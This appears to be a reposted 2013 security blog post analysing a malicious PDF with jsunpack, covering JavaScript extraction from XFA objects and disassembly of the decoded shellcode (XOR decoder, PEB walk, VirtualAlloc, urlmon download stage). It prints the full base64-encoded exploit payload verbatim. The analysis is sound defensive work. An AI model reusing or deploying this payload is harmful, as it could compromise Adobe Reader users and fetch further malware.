2013年4月27日 星期六

Analyzing Malicious PDFs or: How I Learned to Stop Worrying and Love Adobe Reader (Part 1)

http://visiblerisk.com/blog/2013/4/8/analyzing-malicious-pdfs-or-how-i-learned-to-stop-worrying-a.html

We here at Visible Risk love open source software. Some of the best applications used by security professionals are open source - Volatility & WireShark to name a few. We also want to contribute back to the community as much as we can. This blog post and the next blog post will focus on analyzing malicious PDF files and the changes we’ve made to jsunpack to facilitate this analysis. The changes we’ve made involve extracting JavaScript from XFA objects (part 1), handling the various types of encryption methods used (part 2), and parsing and analysis of object streams (also part 2). We’ve shared these changes back to the jsunpack project and you can download the latest version with these changes soon(now?).
Adobe Reader has had its share of vulnerabilities over the years. Because of this, PDFs are a popular delivery mechanism for client-side attacks. However, instead of focusing on creating signatures for each individual exploit, it’s usually easier and more effective to focus on the part of the attack that is most common… JavaScript.
PDFs can have JavaScript in them in essentially two ways - defined in JavaScript objects or defined inside of XFA objects. Since we have better things to do than manually extract this information, it’ll be nice if there was a way to programmatically extract it. Thankfully, there’s an open source project for that already does this, the aforementioned jsunpack. As an example, we’ll use a malicious PDF with a SHA256 of 7d033b4aafbae119e9459a06530b4d4c6202fb6b697f4b048a63344c1e0bc30f.
We start by running the main jsunpack script on the PDF.
(23)>python jsunpackn.py ~/malpdf.pdf
(24)>
Well, that was disappointing. I wonder what happened? To investigate, we’ll just run pdf.py on it

(25)>python pdf.py ~/malpdf.pdf parsing malpdf.pdf
Wrote JavaScript (22817 bytes — 16999 headers / 5818 code) to file malpdf.pdf.out
That’s promising. Let’s take a quick look.

Looks like JavaScript to me! Let’s run it in spidermonkey.
(12)>js malpdf.pdf.out
malpdf.pdf.out:8: SyntaxError: missing ) after condition:
malpdf.pdf.out:8: i=7;y=bib(b,i);s=nob();if(s>=t){v=d;v+=kit(p,x);q=8;v+=bib(lab,q);
malpdf.pdf.out:8: ___________________________^
So close! And that explains why jsunpackn didn’t display anything. Let’s take a closer look at the PDF. We see that in obj 9 0, obj 6 0 is defined as a XFA object.

Looking at obj 6 0, we see that it’s compressed.

Specifically, you see that the filter used is called FlateDecode. FlateDecode is the deflate compression method from zlib. There are several different compression types that can be used and they can actually be chained together. Decompressing this stream is no worry because jsunpack already handles compressed streams. After decompressing this stream, we can see the data is XML. Since the data is XML, the simplest way to navigate it is using an XML parser. It also has the benefit of converting the > to a > for us. After making these changes to pdf.py, we extract the JavaScript again and run it.
(52)>js malpdf.pdf.out
malpdf.pdf.out:12: ReferenceError: vKMfFyr1 is not defined
Progress! A different syntax error this time. What in the world is vKMfFyr1? And why would the JavaScript expect that to be defined. Looking back at the XML data, we see that VKMfFyr1 is the name of the field tag that contains the JavaScript. We also see it is the name of a tag in the <xfa:data> section. As it turns out, Adobe Reader will give its JavaScript engine an object with the name from the field tag, vKMfFyrl, and set its rawValue property to the corresponding data in the <xfa:data> tag. In our case, it’s empty, but we do need the property defined. We add those changes in, and we run it again.
(55)>js malpdf.pdf.out
(56)>
No more syntax error! Still no output either though. Let’s take a closer look to at the last part of the extracted JavaScript.

What does vKMfFyr1[u] = v do? It turns out u is the string “rawValue” and v is a really long string. Since we want to analyze this string, we make pdf.py print out the value of rawValue. And this is what we see:
SUkqADggAACQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6xe5iQMAAIs0JIn3VoA+XnQGrDTcquL6w+jk////glGqyDSG3dzcZanf3NxVGy94IzxRbNTf3Nw0mN3c3EtRQ9zZ3Ny21oGR01hM3Nzcios0t93c3LRc3tzcj4s05N3c3FkcqN43PLS9XQUTNG7e3NwjDODaoMQ0r93c3OHc/NzcodCPNHHc3NxZHKnCN2SPNLjc3NxZHKnO7Ry4V5zEV5zo4Tje3NyoBjdAi1UrtiOF7RwgLnJLg1zk3KjfSjdYi+0ctiOFIC66cxubIufc7dyDtFze3NyPizRn3NzctC4HqHE0W93c3LREs5PhjDRq3dzctty2IiMMiVU5toiF9RC8UaD4/IvtHC92g1GrzLaYU9rtB7RUIm/KNNje3NyLio+Pj4+Pj48jqdQjDFWY+MC9FR7Y3IlVObbghfUQi1Gg+NiNi+0cL3aDU9u2r7Sy3L3ctK7cqdxVu9AjqdRTm8y0JqZJODTY3dzctAEE8iCMNO/d3NyLIwxfGNCDFR7Y3LSIFnNNNETd3Ny2nLTczNzctt223CMMH4lVOTSE3dzctLkzk9mMNCHc3NztFY2NI6nMI6nQI6nUjSMMFR7Q3IlVObQuB6hxNH7c3Ny0opZfC4w0Ddzc3LbctPncj9xR0PgjqdCNI6nUIwwVHtTciVU5XTDU3tzcvO0HtKs31/00ttzc3Eq003vChYo0RNzc3FGRII221LYjIwxNP5a0hrIHB4o0XNzc3FGRJFFhJCEjI4203N7c3Iu2xSOpICMMTT/5tBFQqy2KNIfc3Nwj6yMM02rUlbTuotr8ijSU3NzcjSPrIwxXxFWA+MC9FR+87Ry4V4zsV47QV47IV6707SPtHHCaWRyo0eC9oN7w/B0T0d0bNzfnoPj4V57MV86pB1WY+MC9HtjcvFew+PhXmeBXiNmk3TZXlsRXhvzdNz/olVfoV90y7SPtHCBwWByo2x0T0d0bNyjnoPj0qT1XhvjdN7pX0JdXhsDdN1fYV900VZj4wL0e1Ny0s7Lc3LSprrCxiDTf3NzchYUftFKS0jC0yxb3sjSIIyMjjDRUIyMjIzy0yxb3sjSeIyMjI6j42Iw0riMjIx7Y3LSoqKzm8/Ompq6ysrm9uba0tfK4uLKv8rK9sbnzvuqys6S97fPj7u+5uOu/v+vtv7noueXr7unr6L7s7Om67Onp5Ont7O7s7ezr6bjpuuzv7O3p7+y/7Ovs7unr6e7suem+6b3s6+ft5+/c3NwAkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkAcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAApWOASiAJikqWIYBKkB+ASjCQhErYp4BKjauASiYAAAAAAAAAAAAAAAAAAABBQUFBQUFBQaVjgEpqaVmNM7WASqVjgEp0JASNT0uCSqVjgEp4DPOkIg6CSqJjgEpBQUFBMclki3Ewi3YMi3Yci24Ii0YgizZmOUgYdfKLRTyLVAV4AeqLciAB7jHJQa0B6IsYK1gEgfvlIN3/de9Ji1okAetmiwxLi1ocAesDLIuJ5moE/zb/1YXArXX1gThJSSoAde2WMcm1A/Ol


Excellent, jsunpack’s pdf parser has done its job.
But what about that string? It looks base64 encoded to me; let’s treat it as such and decode it. And when you decode it, you get a string that begins like this
49492a003820000090909090909090909090909090909090909090909090909090909090909090909090909090909090
That looks like some shellcode to me. Let’s analyze that. At 1534 bytes into the string, there is a sequence of bytes that if they were an x86 instruction, they would be a near call. Shellcode will often use near call instructions to find itself in memory. A near call pushes EIP onto the stack. The shellcode can then read the address from the stack, giving it the location in memory of the instruction after the near call. The shellcode can then use that value to deobfuscate the rest of the shellcode.
ADDRESSDISASSEMBLYCOUNTEXE COUNT
0x40ffe9Lmov ecx,0x38911
0x40ffeeLmov esi,[esp]12
0x40fff1Lmov edi,esi13
0x40fff3Lpush esi14
0x40fff4Lcmp byte [esi],0x5e15
0x40fff7Ljz 0x40ffff16
0x40fff9Llodsb9053623
0x40fffaLxor al,0xdc9053624
0x40fffcLstosb9053625
0x40fffdLloop 0x40fff99053626
0x40ffffLret13627
0x410000call 0x40ffe910
The shellcode deobfuscates the rest of the shellcode with the XOR key 0xdc. Then it goes to find the base address of kernel32. It uses the well known technique of using the Process Environment Block (PEB) to walk the list of loaded modules in the current process. This particular shellcode walks the InMemoryOrder list. As it walks the loaded modules list, it creates a simple hash of the DLL name and compares it to the hash value precalculated for kernel32 (0x6e2bca17).
ADDRESSDISASSEBMLYCOUNTEXE COUNT
0x410256Lpusha13635
0x410257Lxor eax,eax13636
0x410259Lmov edx,fs:[eax+0x30]13637
0x41025dLmov edx,[edx+0xc]13638
0x410260Lmov edx,[edx+0x14]13639
0x410263Lmov esi,[edx+0x28]23749
0x410266Lxor edi,edi23750
0x410268Lxor eax,eax233880
0x41026aLlodsb233881
0x41026bLinc esi233882
0x41026cLtest eax,eax233883
0x41026eLjz 0x41027d233884
0x410270Lcmp al,0x61213874
0x410272Ljl 0x410276213875
0x410274Lsub al,0x20173876
0x410276Lror edi,0xd213877
0x410279Ladd edi,eax213878
0x41027bLjmp 0x410268213879
0x41027dLcmp edi,[esp+0x24]23885
0x410281Lmov eax,[edx+0x10]23886
0x410284Lmov edx,[edx]23887
0x410286Ljnz 0x41026323888
0x410288Lmov [esp+0x1c],eax13889
0x41028cLpopa13890
0x41028dLretn 0x413891
The shellcode then walks kernel32’s export table for the the function VirtualAlloc. It then calls VirtualAlloc.
ADDRESSDISASSEMBLYCOUNTEXE COUNT
0x410172push byte 0x4014700
0x410174Lpush dword 0x100014701
0x410179Lpush byte 0x114702
0x41017bLpush byte 0x014703
0x41017dLcall eax14704
Or in a more readable format
kernel32.VirtualAlloc(lpAddress=0x0, dwSize=0x1, flAllocationType=0x1000, flProtect=0x40)
Interestingly, only one byte is requested. However, since lpAddress is set to null, it gets all the space allocated up to the next page boundary. The shellcode relies on this, since it then copies 0x375 bytes into that newly allocated space and then jumps into it.
ADDRESSDISASSEMBLYCOUNTEXE COUNT
0x41000emov ecx,0x37514712
0x410013Lmov edi,eax14713
0x410015Lrep movsb14714
0x410017Ljmp eax14715
The shellcode then proceeds to do a several interesting things. Instead of loading DLLs by using LoadLibraryA in kernel32, it finds most of them the same way it finds kernel32 - by walking the going through the PEB to the loaded modules list. Though it will eventually find LoadLibraryA and use it to load urlmon.dll so it can downloaded the next stage from the internet. It also relies on the API calls that use wide characters rather than ascii. Finally, there’s two different execution paths, one for Windows XP and earlier, and one for Windows Vista and later. The shellcode calls GetVersion from kernel32 to determine what version of Windows is being run.
ADDRESSDISASSEMBLYCOUNTEXE COUNT
0xf000003fcall eax112078
0x410017Lcmp al,0x6112085

The shellcode checks the major version of the OS. Microsoft provides those values here. The short story is the 6 is Windows Vista and later, and 5 is Windows XP and earlier. For Windows Vista and later, the shellcode finds advapi32 and shell32 through the process’ loaded modules, not by using LoadLibraryA. In all, the DLL calls made are:
kernel32.VirtualAlloc()
kernel32.VirtualAlloc()
ntdll.swprintf()
kernel32.LoadLibraryA(lpFileName=urlmon)
